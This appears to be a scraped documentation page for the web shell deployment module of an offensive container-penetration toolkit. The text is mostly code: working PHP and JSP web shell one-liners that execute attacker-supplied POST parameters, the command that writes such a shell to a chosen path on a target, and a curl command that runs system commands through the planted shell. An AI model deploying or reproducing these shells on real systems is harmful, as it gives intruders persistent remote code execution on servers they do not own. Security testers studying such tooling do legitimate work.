We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Generate PHP or JSP web shell with random POST params, then write it to target path.
生成接受随机POST参数的PHP或JSP webshell写入指定文件。
PHP webshell:
<?php @eval($_POST['$SECRET_PARAM']);?>
JSP webshell:
<%Runtime.getRuntime().exec(request.getParameter("$SECRET_PARAM"));%>
cdk run webshell-deploy (php|jsp) <path>
./cdk run webshell-deploy php /tmp/shell.php
After exploit run curl -d "cdk_sgrytry=system(whoami)" to connect webshell.
curl -d "cdk_sgrytry=system(whoami)"